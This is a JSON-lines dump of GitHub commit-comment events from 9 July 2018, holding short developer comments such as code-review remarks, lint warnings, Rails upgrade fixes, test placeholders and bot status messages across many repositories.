{"id":"7935161430","type":"CommitCommentEvent","actor":{"login":"CHYinYiHang"},"repo":{"name":"CHYinYiHang/Docker"},"payload":{"comment":{"id":29635994,"position":null,"line":null,"path":null,"commit_id":"643b6f2b768ed814d04cc4c71c74782c02ee51e8","created_at":"2018-07-09T03:03:48Z","updated_at":"2018-07-09T03:03:48Z","author_association":"OWNER","body":"医药行业好好发挥风格化风格化"}},"created_at":"2018-07-09T03:03:48Z"}
{"id":"7935161553","type":"CommitCommentEvent","actor":{"login":"CHYinYiHang"},"repo":{"name":"CHYinYiHang/Docker"},"payload":{"comment":{"id":29635995,"position":null,"line":null,"path":null,"commit_id":"643b6f2b768ed814d04cc4c71c74782c02ee51e8","created_at":"2018-07-09T03:03:52Z","updated_at":"2018-07-09T03:03:52Z","author_association":"OWNER","body":"q'we"}},"created_at":"2018-07-09T03:03:52Z"}
{"id":"7935168070","type":"CommitCommentEvent","actor":{"login":"cupsd"},"repo":{"name":"cupsd/Notes"},"payload":{"comment":{"id":29636002,"position":null,"line":null,"path":null,"commit_id":"419be61753f5b9e21b7f7615fd2b1c6298344fda","created_at":"2018-07-09T03:06:39Z","updated_at":"2018-07-09T03:06:39Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-09T03:06:39Z"}
{"id":"7935171313","type":"CommitCommentEvent","actor":{"login":"slashiee"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29636004,"position":null,"line":null,"path":null,"commit_id":"3dc873e9e138ca03b518ebcd705b32303cb5742e","created_at":"2018-07-09T03:08:08Z","updated_at":"2018-07-09T03:08:08Z","author_association":"OWNER","body":"I have NO CLUE why it's doing this"}},"created_at":"2018-07-09T03:08:08Z"}
{"id":"7935174866","type":"CommitCommentEvent","actor":{"login":"LeoUrzua"},"repo":{"name":"LeoUrzua/search-algorithms-AI"},"payload":{"comment":{"id":29636008,"position":null,"line":null,"path":null,"commit_id":"acb6b33bf7283f8d03f74bd3f80aeaa451e7d694","created_at":"2018-07-09T03:09:44Z","updated_at":"2018-07-09T03:09:44Z","author_association":"OWNER","body":"uwydhajfl\r\n\r\n> rwqer\r\n\r\n`ewqrfaes`\r\n\r\n\r\n**ewqr**"}},"created_at":"2018-07-09T03:09:44Z"}
{"id":"7935178431","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"yonghyun123/javaWeb"},"payload":{"comment":{"id":29636013,"position":null,"line":null,"path":null,"commit_id":"2b3fef1c98c382fab2cedb66614749edd1a9857f","created_at":"2018-07-09T03:11:22Z","updated_at":"2018-07-09T03:11:22Z","author_association":"OWNER","body":"ignore를 까먹고 안했네요\r\n감사합니다"}},"created_at":"2018-07-09T03:11:22Z"}
{"id":"7935187543","type":"CommitCommentEvent","actor":{"login":"CESARDELATORRE"},"repo":{"name":"dotnet/machinelearning"},"payload":{"comment":{"id":29636027,"position":null,"line":null,"path":null,"commit_id":"828dc227f4d7346e11094479c7a2e443addc8102","created_at":"2018-07-09T03:15:26Z","updated_at":"2018-07-09T03:15:26Z","author_association":"CONTRIBUTOR","body":"Related PR to be approved/merged:\r\nhttps://github.com/dotnet/machinelearning/pull/505"}},"created_at":"2018-07-09T03:15:26Z"}
{"id":"7935188551","type":"CommitCommentEvent","actor":{"login":"muhdsyimir"},"repo":{"name":"muhdsyimir/testing-123"},"payload":{"comment":{"id":29636028,"position":4,"line":4,"path":"README.md","commit_id":"5432e6c3d19d15fa17387325058259abb3d8ac38","created_at":"2018-07-09T03:15:53Z","updated_at":"2018-07-09T03:15:53Z","author_association":"OWNER","body":"ggtffd"}},"created_at":"2018-07-09T03:15:53Z"}
{"id":"7935189481","type":"CommitCommentEvent","actor":{"login":"CESARDELATORRE"},"repo":{"name":"dotnet/machinelearning"},"payload":{"comment":{"id":29636030,"position":null,"line":null,"path":null,"commit_id":"1679be3b5b684ad4c86004f7734ba40812dd841d","created_at":"2018-07-09T03:16:20Z","updated_at":"2018-07-09T03:16:20Z","author_association":"CONTRIBUTOR","body":"Related PR to be approved/merged:\r\nhttps://github.com/dotnet/machinelearning/pull/505"}},"created_at":"2018-07-09T03:16:20Z"}
{"id":"7935191482","type":"CommitCommentEvent","actor":{"login":"muhdsyimir"},"repo":{"name":"muhdsyimir/testing-123"},"payload":{"comment":{"id":29636036,"position":2,"line":2,"path":"README.md","commit_id":"5432e6c3d19d15fa17387325058259abb3d8ac38","created_at":"2018-07-09T03:17:16Z","updated_at":"2018-07-09T03:17:16Z","author_association":"OWNER","body":"testingg"}},"created_at":"2018-07-09T03:17:16Z"}
{"id":"7935191571","type":"CommitCommentEvent","actor":{"login":"ryotayama"},"repo":{"name":"ryotayama/Hayaemon_macOS"},"payload":{"comment":{"id":29636037,"position":null,"line":null,"path":null,"commit_id":"c476b6c98f108eb8963aeee50ecd172128f1d857","created_at":"2018-07-09T03:17:19Z","updated_at":"2018-07-09T03:17:19Z","author_association":"OWNER","body":"Daisukeさん、ありがとうございます！"}},"created_at":"2018-07-09T03:17:19Z"}
{"id":"7935196464","type":"CommitCommentEvent","actor":{"login":"ioquatix"},"repo":{"name":"wintu/doh-client"},"payload":{"comment":{"id":29636042,"position":null,"line":null,"path":null,"commit_id":"728af4044b43f728efb7040e027c8f8def971ab4","created_at":"2018-07-09T03:19:35Z","updated_at":"2018-07-09T03:19:35Z","author_association":"CONTRIBUTOR","body":"What kind of problem were you having?"}},"created_at":"2018-07-09T03:19:35Z"}
{"id":"7935199770","type":"CommitCommentEvent","actor":{"login":"ashishkrishnan"},"repo":{"name":"JoaquimLey/transport-eta"},"payload":{"comment":{"id":29636045,"position":10,"line":17,"path":"transport-eta-android/mobile-ui/src/main/java/com/joaquimley/transporteta/ui/di/module/ActivityBindingModule.kt","commit_id":"a3508fb9601a01f9cf7a931c5d24d72599680da8","created_at":"2018-07-09T03:21:01Z","updated_at":"2018-07-09T03:21:01Z","author_association":"NONE","body":"Missing newline!. Ignore if don't follow this style. :sweat_smile: "}},"created_at":"2018-07-09T03:21:01Z"}
{"id":"7935202472","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29636049,"position":null,"line":null,"path":null,"commit_id":"091d86b39e4b8cef51e6e48727101124bb4d8a39","created_at":"2018-07-09T03:22:16Z","updated_at":"2018-07-09T03:22:16Z","author_association":"MEMBER","body":"I was sure I tested it just now that lower case d works, and I just found out the reason for it failing. The reason is that lower case d only works when the user is logged in.\r\n\r\nAs a logged in user, lower case d works\r\n\r\n<img width=\"1552\" alt=\"screen shot 2018-07-08 at 8 19 34 pm\" src=\"https://user-images.githubusercontent.com/1315101/42429164-71b40918-82ec-11e8-9f21-bf31ffad6a46.png\">\r\n\r\nBut in incognito mode, it doesn't\r\n\r\n<img width=\"1552\" alt=\"screen shot 2018-07-08 at 8 21 12 pm\" src=\"https://user-images.githubusercontent.com/1315101/42429172-7c9f540e-82ec-11e8-939c-5331bdc5f1c6.png\">\r\n\r\n-mindblown-"}},"created_at":"2018-07-09T03:22:16Z"}
{"id":"7935203442","type":"CommitCommentEvent","actor":{"login":"kwwall"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29636051,"position":34,"line":633,"path":"src/test/java/org/owasp/esapi/reference/AuthenticatorTest.java","commit_id":"5801fcbd6d1eab370e9c9030e82ab92497e2dc4e","created_at":"2018-07-09T03:22:42Z","updated_at":"2018-07-09T03:22:42Z","author_association":"NONE","body":"Agree. Interdependencies in different tests is bad practice and should be eliminated."}},"created_at":"2018-07-09T03:22:42Z"}
{"id":"7935204044","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi2"},"payload":{"comment":{"id":29636053,"position":null,"line":null,"path":null,"commit_id":"3642e915333b8de864bb2c659f1281dcb7df9b3f","created_at":"2018-07-09T03:23:01Z","updated_at":"2018-07-09T03:23:01Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi2/04cb8abe-9f47-4cdb-9723-39925aa2815f\n"}},"created_at":"2018-07-09T03:23:01Z"}
{"id":"7935216790","type":"CommitCommentEvent","actor":{"login":"kschumy"},"repo":{"name":"kschumy/ada-prs"},"payload":{"comment":{"id":29636065,"position":null,"line":null,"path":null,"commit_id":"8c34efb3ec4af78c52cc91f29c79fa224a2f9b7b","created_at":"2018-07-09T03:28:42Z","updated_at":"2018-07-09T03:28:42Z","author_association":"OWNER","body":"The remaining four were fixed in a bug fix in a future commit. The issue was `belongs_to:` defaults to required in Rails 5. Adding `optional: true` fixed this"}},"created_at":"2018-07-09T03:28:42Z"}
{"id":"7935218317","type":"CommitCommentEvent","actor":{"login":"doverdover"},"repo":{"name":"thefewunshaken/kanban-app"},"payload":{"comment":{"id":29636066,"position":5,"line":3,"path":"README.md","commit_id":"a6e0f4400f40027cf5a1ff94bb1234dbc76a04c2","created_at":"2018-07-09T03:29:22Z","updated_at":"2018-07-09T03:29:22Z","author_association":"COLLABORATOR","body":"hey jer"}},"created_at":"2018-07-09T03:29:22Z"}
{"id":"7935219620","type":"CommitCommentEvent","actor":{"login":"kwwall"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29636067,"position":10,"line":422,"path":"src/main/java/org/owasp/esapi/reference/FileBasedAuthenticator.java","commit_id":"5801fcbd6d1eab370e9c9030e82ab92497e2dc4e","created_at":"2018-07-09T03:29:56Z","updated_at":"2018-07-09T03:29:56Z","author_association":"NONE","body":"I do NOT like this. Before, if the directory didn't exist, you would get an Exception thrown and if the intent of the user was to use $HOME/.esapi as the place for ESAPI.properties, etc., they would at least have to manually take action to explicitly create that subdirectory. Now, it will be magically created for them. I do not like that. Generally, it is a misunderstanding or misconfiguration that would cause people to use $HOME/.esapi for ESAPI related files (or someone maybe trying to port something from ESAPI 1.4, which hasn't been supported for many years). Let's not make accidental configurations any easier. If the exception message comes out during the running of JUnit tests, I know it is easy to miss, but the point is, it shouldn't. For JUnit tests, all those files should end up under \"./target/test-classes/esapi\" directory."}},"created_at":"2018-07-09T03:29:56Z"}
{"id":"7935222186","type":"CommitCommentEvent","actor":{"login":"kschumy"},"repo":{"name":"kschumy/ada-prs"},"payload":{"comment":{"id":29636072,"position":6,"line":7,"path":"app/models/submission.rb","commit_id":"973ecde2847d2da54391659953fcbfe7e0cb28e3","created_at":"2018-07-09T03:31:01Z","updated_at":"2018-07-09T03:31:01Z","author_association":"OWNER","body":"Default is now false, which broke tests. Setting this to true fixed tests. See: http://guides.rubyonrails.org/upgrading_ruby_on_rails.html#active-record-belongs-to-required-by-default-option"}},"created_at":"2018-07-09T03:31:01Z"}
{"id":"7935226224","type":"CommitCommentEvent","actor":{"login":"kschumy"},"repo":{"name":"kschumy/ada-prs"},"payload":{"comment":{"id":29636084,"position":5,"line":5,"path":"app/models/user_invite.rb","commit_id":"c0daaa3f30d7a793aa8facaabe153a3d5327de7e","created_at":"2018-07-09T03:32:41Z","updated_at":"2018-07-09T03:32:41Z","author_association":"OWNER","body":"Same optional issue in Rails 5 vs Rails 4"}},"created_at":"2018-07-09T03:32:41Z"}
{"id":"7935233027","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29636090,"position":6,"line":null,"path":"app/src/at-thachnguyen/java/asiantech/internship/summer/storage/SharePreferenceActivity.java","commit_id":"798c96bc5665e76e95f5659be5bd9b0f2b727899","created_at":"2018-07-09T03:35:40Z","updated_at":"2018-07-09T03:35:40Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'android.view.View'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-09T03:35:40Z"}
{"id":"7935233165","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29636092,"position":5,"line":null,"path":"app/build.gradle","commit_id":"798c96bc5665e76e95f5659be5bd9b0f2b727899","created_at":"2018-07-09T03:35:43Z","updated_at":"2018-07-09T03:35:43Z","author_association":"NONE","body":"WARNING: [GradleDependency] A newer version of com.android.support.constraint:constraint-layout than 1.1.1 is available: 1.1.2\n This detector looks for usages of libraries where the version you are using is not the current stable release. Using older versions is fine, and there are cases where you deliberately want to stick with an older version. However, you may simply not be aware that a more recent version is available, and that is what this lint check helps find."}},"created_at":"2018-07-09T03:35:43Z"}
{"id":"7935235738","type":"CommitCommentEvent","actor":{"login":"kwwall"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29636095,"position":7,"line":90,"path":"src/test/java/org/owasp/esapi/reference/AuthenticatorTest.java","commit_id":"cbb6fe0579fc9af85f96cab7fe0fef3d87309a5d","created_at":"2018-07-09T03:36:55Z","updated_at":"2018-07-09T03:36:55Z","author_association":"NONE","body":"IMHO, the user's $HOME directory is sacrosanct and we should NEVER create anything under it. If they want a $HOME/.esapi directory to store the \"users.txt\" file, then let's tweak the IOException error message in FileBasedAuthenticator to make it clear enough that they need to manually create that directory first themselves! And I *especially* don't want to be messing with their \"user.home\" directory (usually the same as $HOME) in a test case."}},"created_at":"2018-07-09T03:36:55Z"}
{"id":"7935236029","type":"CommitCommentEvent","actor":{"login":"shahmirn"},"repo":{"name":"shahmirn/EdiZon_ConfigsAndScripts"},"payload":{"comment":{"id":29636096,"position":null,"line":null,"path":null,"commit_id":"423323cf2a7464b4969aa5c338b95cdc6516dc79","created_at":"2018-07-09T03:37:04Z","updated_at":"2018-07-09T03:37:04Z","author_association":"OWNER","body":"Not yet; working on some code to find the offset based on the PlaySecond string, but my current search algorithm through a lua table is very inefficient.\r\n\r\nHopefully I should have something by tomorrow night"}},"created_at":"2018-07-09T03:37:04Z"}
{"id":"7935237383","type":"CommitCommentEvent","actor":{"login":"GaryC1"},"repo":{"name":"GaryC1/wiki"},"payload":{"comment":{"id":29636101,"position":null,"line":null,"path":null,"commit_id":"929a952bb65fdddf4f1e8fbabbeeef65644ac3dc","created_at":"2018-07-09T03:37:43Z","updated_at":"2018-07-09T03:37:43Z","author_association":"OWNER","body":"初链黄皮书让我来解读 Gary●C"}},"created_at":"2018-07-09T03:37:43Z"}
{"id":"7935238726","type":"CommitCommentEvent","actor":{"login":"matthewwall"},"repo":{"name":"matthewwall/weewx-sftp"},"payload":{"comment":{"id":29636103,"position":null,"line":null,"path":null,"commit_id":"b89dc670729dd28bcde32d62f0215994614aa81c","created_at":"2018-07-09T03:38:24Z","updated_at":"2018-07-09T03:38:24Z","author_association":"OWNER","body":"please post your question at the weewx user group\r\n\r\nhttps://groups.google.com/forum/#!forum/weewx-user\r\n"}},"created_at":"2018-07-09T03:38:24Z"}
{"id":"7935241603","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29636105,"position":null,"line":null,"path":null,"commit_id":"6d0732f7b4fedcbf744896d4f629c0337fc313d0","created_at":"2018-07-09T03:39:45Z","updated_at":"2018-07-09T03:39:45Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/i-cannot-log-into-discourse-on-ios-beta/90428/10\n"}},"created_at":"2018-07-09T03:39:45Z"}
{"id":"7935242052","type":"CommitCommentEvent","actor":{"login":"DanerGe"},"repo":{"name":"DanerGe/dec"},"payload":{"comment":{"id":29636107,"position":null,"line":null,"path":null,"commit_id":"84f58f7f1af2353356b1753fd4fe77a8c002cd59","created_at":"2018-07-09T03:39:57Z","updated_at":"2018-07-09T03:39:57Z","author_association":"OWNER","body":"update first code\r\n\r\n- [ ] [1. ](url)"}},"created_at":"2018-07-09T03:39:57Z"}
{"id":"7935247043","type":"CommitCommentEvent","actor":{"login":"xuyongnojs"},"repo":{"name":"fex-team/webuploader"},"payload":{"comment":{"id":29636111,"position":30,"line":256,"path":"src/runtime/html5/image.js","commit_id":"98e5c1bc761fcff18a02692b7a411b03d591c24f","created_at":"2018-07-09T03:42:16Z","updated_at":"2018-07-09T03:42:16Z","author_association":"NONE","body":"11"}},"created_at":"2018-07-09T03:42:16Z"}
{"id":"7935254660","type":"CommitCommentEvent","actor":{"login":"lijiarui"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29636122,"position":null,"line":null,"path":null,"commit_id":"61e3e6f98a1600da0ac173f94b1d945bc728c8b4","created_at":"2018-07-09T03:45:49Z","updated_at":"2018-07-09T03:45:49Z","author_association":"MEMBER","body":"I have a suggestion, maybe we shouldn't add puppet here. It should in `wechaty` project. Because of no need to let the developer know what is puppet when he first uses wechaty."}},"created_at":"2018-07-09T03:45:49Z"}
{"id":"7935255444","type":"CommitCommentEvent","actor":{"login":"xcguang"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29636123,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-09T03:46:11Z","updated_at":"2018-07-09T03:46:11Z","author_association":"NONE","body":"Hi，\r\nWe do some optimization about malloc, and got some iram space as memory. "}},"created_at":"2018-07-09T03:46:11Z"}
{"id":"7935258263","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"zenany/weekly"},"payload":{"comment":{"id":29636125,"position":32,"line":32,"path":"software/2018/0709.md","commit_id":"46cef5028b5d773d46cbeb3e88b2e7d9aca04761","created_at":"2018-07-09T03:47:29Z","updated_at":"2018-07-09T03:47:29Z","author_association":"NONE","body":"url 变成了 https://tech.meituan.com/fe_and_golang.html ...."}},"created_at":"2018-07-09T03:47:29Z"}
{"id":"7935262728","type":"CommitCommentEvent","actor":{"login":"liuxiaoqi1993"},"repo":{"name":"liuxiaoqi1993/LXQFirstRepository"},"payload":{"comment":{"id":29636129,"position":5,"line":3,"path":"learn2.txt","commit_id":"fad42f160e4f413bafae94f9a1f4de65ec2a441f","created_at":"2018-07-09T03:49:32Z","updated_at":"2018-07-09T03:49:32Z","author_association":"OWNER","body":" 啊啊\r\n"}},"created_at":"2018-07-09T03:49:32Z"}
{"id":"7935266016","type":"CommitCommentEvent","actor":{"login":"aylarice"},"repo":{"name":"aylarice/test"},"payload":{"comment":{"id":29636131,"position":null,"line":null,"path":null,"commit_id":"a4559788ea83a92e74e4d5d3ec303b9382b1ff37","created_at":"2018-07-09T03:51:07Z","updated_at":"2018-07-09T03:51:07Z","author_association":"OWNER","body":"20180709"}},"created_at":"2018-07-09T03:51:07Z"}
{"id":"7935271749","type":"CommitCommentEvent","actor":{"login":"Wang-zipeng"},"repo":{"name":"jiangxiluning/chinese-ocr"},"payload":{"comment":{"id":29636139,"position":null,"line":null,"path":null,"commit_id":"88d8d9bb5537a112a42794c1bacc64ef9fdf0a8d","created_at":"2018-07-09T03:53:54Z","updated_at":"2018-07-09T03:53:54Z","author_association":"NONE","body":"您好，我使用过您的文字方向分类模型，效果非常好。有几个问题想向您请教一下：\r\n1. 您的训练数据集是什么？训练方法是什么？\r\n2. 汉字正置与倒置应该比较相像，vgg模型输入是224*224的，分类的精度是如何保证的？\r\n希望您能在百忙当中给予解答，非常感谢。"}},"created_at":"2018-07-09T03:53:54Z"}
{"id":"7935275866","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29636152,"position":null,"line":null,"path":null,"commit_id":"b6f9244d6bb00bb3ccc10d42503f33ba1c3aaa70","created_at":"2018-07-09T03:55:58Z","updated_at":"2018-07-09T03:55:58Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-09T03:55:58Z"}
{"id":"7935279838","type":"CommitCommentEvent","actor":{"login":"nathanhaigh"},"repo":{"name":"GMOD/jbrowse"},"payload":{"comment":{"id":29636160,"position":5,"line":5,"path":"release-notes.md","commit_id":"df1252e4483fa56f4adfa6195edbe17e09331e94","created_at":"2018-07-09T03:57:56Z","updated_at":"2018-07-09T03:57:56Z","author_association":"CONTRIBUTOR","body":"I think this feature addition would be seen as a major improvement to many in the plant world who have struggled getting traction for CSI support in modern genome browsers - As of this time, I'm quite sure JBrowse is the only genome browser to support CSI indexes."}},"created_at":"2018-07-09T03:57:56Z"}
{"id":"7935281214","type":"CommitCommentEvent","actor":{"login":"endiliey"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29636166,"position":null,"line":null,"path":null,"commit_id":"85314dd1531cbe540ddac2c80476c8e86bff3dda","created_at":"2018-07-09T03:58:38Z","updated_at":"2018-07-09T03:58:38Z","author_association":"COLLABORATOR","body":"Test are failing because of \r\n`const env = require('./env.js');` resolves differently in jest (it becomes `test/env` instead of `server/env`)\r\n\r\nOne solution is to mock the relative path or code split the env require inside getLanguage function"}},"created_at":"2018-07-09T03:58:38Z"}
{"id":"7935282494","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"zenany/weekly"},"payload":{"comment":{"id":29636169,"position":77,"line":77,"path":"software/2018/0709.md","commit_id":"46cef5028b5d773d46cbeb3e88b2e7d9aca04761","created_at":"2018-07-09T03:59:14Z","updated_at":"2018-07-09T03:59:14Z","author_association":"NONE","body":"对应代码 https://github.com/cloudflare/cloudflare-blog/tree/master/2018-07-dropping-packets"}},"created_at":"2018-07-09T03:59:14Z"}
{"id":"7935283408","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29636172,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-09T03:59:42Z","updated_at":"2018-07-09T03:59:42Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-09T03:59:42Z"}
{"id":"7935284504","type":"CommitCommentEvent","actor":{"login":"bashleigh"},"repo":{"name":"juliandavidmr/awesome-nest"},"payload":{"comment":{"id":29636177,"position":null,"line":null,"path":null,"commit_id":"c0ed3835853818861e6f3393aebdd9706b753460","created_at":"2018-07-09T04:00:12Z","updated_at":"2018-07-09T04:00:12Z","author_association":"NONE","body":"Trhanks for ripping me off..."}},"created_at":"2018-07-09T04:00:12Z"}
{"id":"7935290429","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29636186,"position":66,"line":66,"path":"Assignment3/index.html","commit_id":"f99663a3f48b8f3b8a0e24a891c90fd675f77656","created_at":"2018-07-09T04:02:35Z","updated_at":"2018-07-09T04:02:35Z","author_association":"NONE","body":"Row should be below container"}},"created_at":"2018-07-09T04:02:35Z"}
{"id":"7935290463","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29636187,"position":null,"line":null,"path":null,"commit_id":"85314dd1531cbe540ddac2c80476c8e86bff3dda","created_at":"2018-07-09T04:02:36Z","updated_at":"2018-07-09T04:02:36Z","author_association":"MEMBER","body":"I realized that too, but seems so troublesome. Sigh this path thingy is so annoying."}},"created_at":"2018-07-09T04:02:36Z"}
{"id":"7935291414","type":"CommitCommentEvent","actor":{"login":"nathanhaigh"},"repo":{"name":"GMOD/jbrowse"},"payload":{"comment":{"id":29636188,"position":6,"line":6,"path":"release-notes.md","commit_id":"df1252e4483fa56f4adfa6195edbe17e09331e94","created_at":"2018-07-09T04:03:06Z","updated_at":"2018-07-09T04:03:06Z","author_association":"CONTRIBUTOR","body":"The BAI index actually has a limit of 2<sup>29</sup>-1bp (~537 Mbases) on a given reference sequence - much less than the 1Gbp stated here. Therefore CSI become critical at a much shorter chromosome sequence length than stated here."}},"created_at":"2018-07-09T04:03:06Z"}
{"id":"7935291742","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29636190,"position":null,"line":null,"path":null,"commit_id":"85314dd1531cbe540ddac2c80476c8e86bff3dda","created_at":"2018-07-09T04:03:14Z","updated_at":"2018-07-09T04:03:14Z","author_association":"MEMBER","body":"I'm gonna take a break from Docusaurus for today. Had enough of head banging for the day 😂 "}},"created_at":"2018-07-09T04:03:14Z"}
{"id":"7935293039","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29636193,"position":7,"line":7,"path":"bootstrap1.html","commit_id":"25650ce908b2f9af1e9a372bb44d92e380bbf938","created_at":"2018-07-09T04:03:52Z","updated_at":"2018-07-09T04:03:52Z","author_association":"NONE","body":"Shouldn't we use a 'css' folder for CSS ."}},"created_at":"2018-07-09T04:03:52Z"}
{"id":"7935293709","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29636194,"position":19,"line":19,"path":"bootstrap1.html","commit_id":"25650ce908b2f9af1e9a372bb44d92e380bbf938","created_at":"2018-07-09T04:04:12Z","updated_at":"2018-07-09T04:04:12Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-09T04:04:12Z"}
{"id":"7935294742","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29636198,"position":203,"line":203,"path":"bootstrap1.html","commit_id":"25650ce908b2f9af1e9a372bb44d92e380bbf938","created_at":"2018-07-09T04:04:40Z","updated_at":"2018-07-09T04:04:40Z","author_association":"NONE","body":"Check a whole lot of indentation in whole html"}},"created_at":"2018-07-09T04:04:40Z"}
{"id":"7935296067","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29636205,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-09T04:05:19Z","updated_at":"2018-07-09T04:05:19Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-09T04:05:19Z"}
{"id":"7935296221","type":"CommitCommentEvent","actor":{"login":"bashleigh"},"repo":{"name":"juliandavidmr/awesome-nest"},"payload":{"comment":{"id":29636208,"position":null,"line":null,"path":null,"commit_id":"3e5e206c4363f97a0fcb1a2b624860a77e5c2eb8","created_at":"2018-07-09T04:05:24Z","updated_at":"2018-07-09T04:05:24Z","author_association":"NONE","body":"This guy made a fork of my repo then change it. https://github.com/bashleigh/nest-config I was going to add my package to your list once I was happy with adding some decorators. I'm quite angry this guy is taking credit for my idea and work. I know it's a small package but do you mind replacing the link with mine? "}},"created_at":"2018-07-09T04:05:24Z"}
{"id":"7935296937","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sagarsaindre/Htmlassignments"},"payload":{"comment":{"id":29636210,"position":11,"line":11,"path":"HTML_Assignments/Assignment3/index.html","commit_id":"6c658ad5604027e2c0174483317ae76e1f4e71f1","created_at":"2018-07-09T04:05:44Z","updated_at":"2018-07-09T04:05:44Z","author_association":"NONE","body":"Where is container ?"}},"created_at":"2018-07-09T04:05:44Z"}
{"id":"7935297829","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29636214,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-09T04:06:12Z","updated_at":"2018-07-09T04:06:12Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-09T04:06:12Z"}
{"id":"7935298676","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sagarsaindre/Htmlassignments"},"payload":{"comment":{"id":29636216,"position":130,"line":130,"path":"HTML_Assignments/Assignment3/index.html","commit_id":"6c658ad5604027e2c0174483317ae76e1f4e71f1","created_at":"2018-07-09T04:06:37Z","updated_at":"2018-07-09T04:06:37Z","author_association":"NONE","body":"Jumbotron should be a part of container, you have done the inverse"}},"created_at":"2018-07-09T04:06:37Z"}
{"id":"7935300349","type":"CommitCommentEvent","actor":{"login":"dosyago-coder-0"},"repo":{"name":"dosyago-coder-0/brutal.js"},"payload":{"comment":{"id":29636221,"position":40,"line":81,"path":"r.js","commit_id":"b5c7bf0cd5fec9032c0d1705ea4905d8ffa33ec8","created_at":"2018-07-09T04:07:26Z","updated_at":"2018-07-09T04:07:26Z","author_association":"OWNER","body":"At this line `val` is the `str` property of a `{str,handlers}` object. This means: \r\n\r\n- it can actually contain HTML\r\n- any replaced values in str have already passed through R one time"}},"created_at":"2018-07-09T04:07:26Z"}
{"id":"7935302274","type":"CommitCommentEvent","actor":{"login":"yoghaprs"},"repo":{"name":"sajjadjaved01/iptv"},"payload":{"comment":{"id":29636233,"position":null,"line":null,"path":null,"commit_id":"6b8d66bcb8439c6920cff2e7488b049150621799","created_at":"2018-07-09T04:08:24Z","updated_at":"2018-07-09T04:08:24Z","author_association":"NONE","body":"How to delete sign in menu ,and only browse m3u"}},"created_at":"2018-07-09T04:08:24Z"}
